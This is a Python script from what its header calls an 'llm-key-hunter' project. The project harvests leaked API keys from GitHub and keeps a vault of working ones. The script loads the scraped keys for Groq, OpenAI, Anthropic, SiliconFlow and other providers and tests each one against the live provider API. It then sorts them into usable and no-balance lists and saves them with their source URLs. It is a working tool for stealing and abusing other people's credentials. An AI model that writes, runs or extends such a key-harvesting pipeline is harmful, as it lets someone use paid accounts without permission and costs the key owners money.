- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
292 lines
11 KiB
Python
292 lines
11 KiB
Python
#!/usr/bin/env python3
|
|
"""Deep-verify the 'medium' providers in one pass.
|
|
|
|
Providers: Groq, TogetherAI, OpenAI, Anthropic, SiliconFlow,
|
|
LingyiWanwu (01), StepFun.
|
|
|
|
For every key in results/extracted_keys.txt whose provider matches,
|
|
we:
|
|
1. Validate the key against the provider's documented regex.
|
|
2. Send a cheap chat completion (or /models GET) request.
|
|
3. Classify by the now-familiar rule: only 401 = DEAD; anything
|
|
else (200 / 400 / 402 / 403 / 404 / 429 / 5xx) is kept.
|
|
|
|
Outputs per provider under results/medium/<Provider>/.
|
|
"""
|
|
|
|
import argparse
|
|
import json
|
|
import re
|
|
import sys
|
|
import time
|
|
import urllib.request
|
|
import urllib.error
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
HERE = Path(__file__).parent
|
|
sys.path.insert(0, str(HERE))
|
|
from verify_cache import CachedVerifier
|
|
|
|
SOURCE = HERE / "results" / "extracted_keys.txt"
|
|
OUT_ROOT = HERE / "results" / "medium"
|
|
OUT_ROOT.mkdir(parents=True, exist_ok=True)
|
|
|
|
UA = "curl/8.5.0"
|
|
|
|
# ── Provider configs ────────────────────────────────────────────
|
|
# Each entry:
|
|
# key_re : regex the full key must match (after provider tag)
|
|
# fakes : substrings that mark a placeholder
|
|
# requests : list of (name, method, path, headers, body) to try in order.
|
|
# {key} is substituted; stop early once a better verdict found.
|
|
def openai_like(base, model, key_header="Authorization", scheme="Bearer"):
|
|
return [
|
|
{
|
|
"name": f"chat:{model}",
|
|
"method": "POST",
|
|
"url": f"{base}/v1/chat/completions",
|
|
"headers": {key_header: f"{scheme} {{key}}", "Content-Type": "application/json"},
|
|
"body": {"model": model, "messages": [{"role": "user", "content": "hi"}], "max_tokens": 1},
|
|
},
|
|
{
|
|
"name": "models",
|
|
"method": "GET",
|
|
"url": f"{base}/v1/models",
|
|
"headers": {key_header: f"{scheme} {{key}}"},
|
|
"body": None,
|
|
},
|
|
]
|
|
|
|
|
|
PROVIDERS = {
|
|
"Groq": {
|
|
"key_re": re.compile(r"^gsk_[A-Za-z0-9]{48,}$"),
|
|
"fakes": ("your-", "example", "xxxx"),
|
|
"requests": openai_like("https://api.groq.com", "llama-3.1-8b-instant"),
|
|
},
|
|
"TogetherAI": {
|
|
"key_re": re.compile(r"^[0-9a-f]{64}$"),
|
|
"fakes": ("0" * 64,),
|
|
"requests": openai_like("https://api.together.xyz", "meta-llama/Llama-3.2-3B-Instruct-Turbo"),
|
|
},
|
|
"OpenAI": {
|
|
# Real OpenAI keys: sk-... (48-ish chars) or sk-proj-... (longer).
|
|
# We deliberately exclude keys that look like other providers'
|
|
# (sk-ant handled separately, T3BlbkFJ is a classic OpenAI marker).
|
|
"key_re": re.compile(r"^sk-(?:proj-[A-Za-z0-9_-]{20,}|[A-Za-z0-9]{48})$"),
|
|
"fakes": ("your-", "example", "xxxx", "sk-000000"),
|
|
"requests": openai_like("https://api.openai.com", "gpt-4o-mini"),
|
|
},
|
|
"Anthropic": {
|
|
"key_re": re.compile(r"^sk-ant-[A-Za-z0-9_\-]{40,}$"),
|
|
"fakes": ("your-", "example", "xxxx"),
|
|
"requests": [
|
|
{
|
|
"name": "messages",
|
|
"method": "POST",
|
|
"url": "https://api.anthropic.com/v1/messages",
|
|
"headers": {
|
|
"x-api-key": "{key}",
|
|
"anthropic-version": "2023-06-01",
|
|
"Content-Type": "application/json",
|
|
},
|
|
"body": {"model": "claude-3-5-haiku-20241022",
|
|
"messages": [{"role": "user", "content": "hi"}],
|
|
"max_tokens": 1},
|
|
},
|
|
{
|
|
"name": "models",
|
|
"method": "GET",
|
|
"url": "https://api.anthropic.com/v1/models",
|
|
"headers": {"x-api-key": "{key}", "anthropic-version": "2023-06-01"},
|
|
"body": None,
|
|
},
|
|
],
|
|
},
|
|
"SiliconFlow": {
|
|
"key_re": re.compile(r"^sk-[a-zA-Z0-9]{40,}$"),
|
|
"fakes": ("your-", "example", "xxxx"),
|
|
"requests": openai_like("https://api.siliconflow.cn", "Qwen/Qwen2.5-7B-Instruct"),
|
|
},
|
|
"LingyiWanwu": {
|
|
"key_re": re.compile(r"^sk-[a-zA-Z0-9]{40,}$"),
|
|
"fakes": ("your-", "example", "xxxx"),
|
|
"requests": openai_like("https://api.lingyiwanwu.com", "yi-large"),
|
|
},
|
|
"StepFun": {
|
|
"key_re": re.compile(r"^sk-[a-zA-Z0-9]{40,}$"),
|
|
"fakes": ("your-", "example", "xxxx"),
|
|
"requests": openai_like("https://api.stepfun.com", "step-1-flash"),
|
|
},
|
|
}
|
|
|
|
RANK = {"USABLE": 4, "NO_BALANCE": 3, "NO_ACCESS": 2, "UNKNOWN": 1, "DEAD": 0}
|
|
|
|
|
|
def http_request(method, url, headers, body, timeout=20):
|
|
h = {"User-Agent": UA, "Accept": "*/*", **headers}
|
|
data = json.dumps(body).encode() if body is not None else None
|
|
req = urllib.request.Request(url, data=data, headers=h, method=method)
|
|
try:
|
|
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
|
return resp.getcode(), resp.read().decode("utf-8", errors="replace")
|
|
except urllib.error.HTTPError as e:
|
|
try:
|
|
return e.code, e.read().decode("utf-8", errors="replace")
|
|
except Exception:
|
|
return e.code, ""
|
|
except Exception as e:
|
|
return 0, f"network: {type(e).__name__}: {e}"
|
|
|
|
|
|
def classify(code, body):
|
|
bl = (body or "").lower()
|
|
if code == 200:
|
|
if '"choices"' in bl or '"data"' in bl or '"id"' in bl:
|
|
return "USABLE", "200 OK"
|
|
if any(x in bl for x in ("balance", "quota", "arrearage", "insufficient")):
|
|
return "NO_BALANCE", body[:140]
|
|
return "USABLE", body[:140]
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"HTTP {code}: {body[:140]}"
|
|
if code == 401:
|
|
return "DEAD", "401 unauthorized"
|
|
if code == 0:
|
|
return "UNKNOWN", body[:160]
|
|
# 400 / 403 / 404 / 5xx — key may be valid, model/endpoint issue
|
|
return "NO_ACCESS", f"HTTP {code}: {body[:140]}"
|
|
|
|
|
|
def verify(provider, key):
|
|
cfg = PROVIDERS[provider]
|
|
best, best_detail = "DEAD", ""
|
|
for req in cfg["requests"]:
|
|
headers = {h: v.replace("{key}", key) for h, v in req["headers"].items()}
|
|
code, body = http_request(req["method"], req["url"], headers, req["body"])
|
|
v, d = classify(code, body)
|
|
d = f"[{req['name']}] {d}"
|
|
if RANK[v] > RANK[best]:
|
|
best, best_detail = v, d
|
|
if best == "USABLE":
|
|
return best, best_detail
|
|
return best, best_detail
|
|
|
|
|
|
def load_keys(provider):
|
|
cfg = PROVIDERS[provider]
|
|
keys = {}
|
|
if not SOURCE.exists():
|
|
return keys
|
|
with open(SOURCE) as f:
|
|
for line in f:
|
|
line = line.strip()
|
|
if not line.startswith(f"{provider}|"):
|
|
continue
|
|
parts = line.split("|", 3)
|
|
if len(parts) < 3:
|
|
continue
|
|
key = parts[1]
|
|
url = parts[2] if len(parts) > 2 else ""
|
|
low = key.lower()
|
|
if any(x in low for x in cfg["fakes"]):
|
|
continue
|
|
if not cfg["key_re"].match(key):
|
|
continue
|
|
if key not in keys:
|
|
keys[key] = url
|
|
return keys
|
|
|
|
|
|
def run_provider(provider, workers, limit, force_cache=False):
|
|
keys = load_keys(provider)
|
|
out_dir = OUT_ROOT / provider
|
|
out_dir.mkdir(parents=True, exist_ok=True)
|
|
print(f"\n=== {provider}: {len(keys)} unique keys matching regex ===")
|
|
if limit:
|
|
keys = dict(list(keys.items())[:limit])
|
|
print(f" (limited to first {limit})")
|
|
if not keys:
|
|
return
|
|
|
|
buckets = {k: [] for k in RANK}
|
|
start = time.time()
|
|
processed = 0
|
|
with CachedVerifier(f"medium_{provider.lower()}",
|
|
lambda k, _p=provider: verify(_p, k),
|
|
force=force_cache) as ver:
|
|
with ThreadPoolExecutor(max_workers=workers) as pool:
|
|
futs = {pool.submit(ver, k): (k, s) for k, s in keys.items()}
|
|
for fut in as_completed(futs):
|
|
k, s = futs[fut]
|
|
processed += 1
|
|
try:
|
|
verdict, detail = fut.result()
|
|
except Exception as e:
|
|
verdict, detail = "UNKNOWN", str(e)
|
|
buckets[verdict].append((k, s, detail))
|
|
if processed % 50 == 0:
|
|
el = time.time() - start
|
|
print(f" [{processed}/{len(keys)}] "
|
|
f"usable={len(buckets['USABLE'])} "
|
|
f"nobal={len(buckets['NO_BALANCE'])} "
|
|
f"noacc={len(buckets['NO_ACCESS'])} "
|
|
f"unk={len(buckets['UNKNOWN'])} "
|
|
f"dead={len(buckets['DEAD'])} "
|
|
f"hit={ver.hits} live={ver.live} "
|
|
f"({processed/el:.1f}/s)")
|
|
print(f" cache: {ver.hits} hits, {ver.live} live, {len(ver._cache)} cached")
|
|
|
|
el = time.time() - start
|
|
print(f" done in {el:.1f}s")
|
|
for n in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
|
|
print(f" {n:11s}: {len(buckets[n])}")
|
|
|
|
name_map = {
|
|
"USABLE": "usable.txt",
|
|
"NO_BALANCE": "no_balance.txt",
|
|
"NO_ACCESS": "no_access.txt",
|
|
"UNKNOWN": "unknown.txt",
|
|
"DEAD": "dead.txt",
|
|
}
|
|
for n, fn in name_map.items():
|
|
with open(out_dir / fn, "w") as f:
|
|
for k, s, d in sorted(buckets[n]):
|
|
f.write(f"{k}|{s}|{d}\n")
|
|
with open(out_dir / "all_non_401.txt", "w") as f:
|
|
for n in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN"):
|
|
for k, s, d in sorted(buckets[n]):
|
|
f.write(f"{n}|{k}|{s}|{d}\n")
|
|
|
|
if buckets["USABLE"]:
|
|
print(f" --- USABLE {provider} keys ---")
|
|
for k, s, d in buckets["USABLE"][:30]:
|
|
print(f" {k} {d[:80]}")
|
|
print(f" src: {s}")
|
|
|
|
|
|
def main():
|
|
ap = argparse.ArgumentParser()
|
|
ap.add_argument("--providers", default="all",
|
|
help="Comma-separated list, or 'all'")
|
|
ap.add_argument("--workers", type=int, default=15)
|
|
ap.add_argument("--limit", type=int, default=0)
|
|
ap.add_argument("--no-cache", action="store_true")
|
|
args = ap.parse_args()
|
|
|
|
if args.providers == "all":
|
|
providers = list(PROVIDERS.keys())
|
|
else:
|
|
providers = [p.strip() for p in args.providers.split(",") if p.strip() in PROVIDERS]
|
|
unknown = [p for p in args.providers.split(",") if p.strip() not in PROVIDERS]
|
|
if unknown:
|
|
print(f"Unknown providers: {unknown}", file=sys.stderr)
|
|
|
|
print(f"Verifying: {', '.join(providers)}")
|
|
for p in providers:
|
|
run_provider(p, args.workers, args.limit, args.no_cache)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|